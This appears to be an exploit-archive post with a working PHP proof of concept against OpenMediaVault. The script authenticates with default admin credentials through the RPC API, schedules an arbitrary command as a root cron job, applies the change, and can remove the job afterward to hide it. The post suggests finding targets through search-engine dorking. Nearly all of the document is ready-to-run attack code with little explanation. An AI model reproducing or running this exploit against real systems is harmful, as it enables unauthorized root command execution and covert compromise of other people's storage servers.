=============================================================================================================================================| # Title : OpenMediaVault 7.4.2-2 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.openmediavault.org/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL library for sending HTTP requests and handles JSON parsing for interaction with the OpenMediaVault API.[+] Line 148 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{ private $targetUri; private $username; private $password; private $persistent; private $cronUuid; private $versionNumber; public function __construct($targetUri, $username, $password, $persistent = false) { $this->targetUri = $targetUri; $this->username = $username; $this->password = $password; $this->persistent = $persistent; } private function sendRequest($url, $data) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json' ]); $response = curl_exec($ch); curl_close($ch); return json_decode($response, true); } public function login() { echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n"; $data = [ 'service' => 'Session', 'method' => 'login', 'params' => [ 'username' => $this->username, 'password' => $this->password ], 'options' => null ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); return isset($response['authenticated']) && $response['authenticated'] === true; } public function checkTarget() { echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n"; $data = [ 'service' => 'System', 'method' => 'getInformation', 'params' => null ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); return $response; } public function checkVersion($response) { if (!empty($response)) { $version = $response['response']['version'] ?? null; return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null; } return null; } public function executeCommand($cmd) { echo "Executing command...\n"; $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*'; $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'; $data = [ 'service' => 'Cron', 'method' => 'set', 'params' => [ 'uuid' => $uuid, 'enable' => true, 'execution' => 'exactly', 'minute' => $schedule, 'hour' => $schedule, 'dayofmonth' => $schedule, 'month' => $schedule, 'dayofweek' => $schedule, 'username' => 'root', 'command' => $cmd, 'sendemail' => false, 'comment' => '', 'type' => 'userdefined' ], 'options' => null ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); $this->cronUuid = $response['response']['uuid'] ?? ''; $this->applyConfigChanges(); echo "Cron payload execution triggered.\n"; } public function applyConfigChanges() { $data = [ 'service' => 'Config', 'method' => 'applyChangesBg', 'params' => [ 'modules' => [], 'force' => false ], 'options' => null ]; $this->sendRequest($this->targetUri . '/rpc.php', $data); } public function removePayload() { if (!$this->persistent) { $data = [ 'service' => 'Cron', 'method' => 'delete', 'params' => [ 'uuid' => $this->cronUuid ] ]; $response = $this->sendRequest($this->targetUri . '/rpc.php', $data); if ($response) { $this->applyConfigChanges(); echo "Cron payload entry successfully removed.\n"; } else { echo "Cannot access cron services to remove payload.\n"; } } }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) { $response = $exploit->checkTarget(); if ($response) { $exploit->versionNumber = $exploit->checkVersion($response); $exploit->executeCommand('your-command-here'); $exploit->removePayload(); }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#google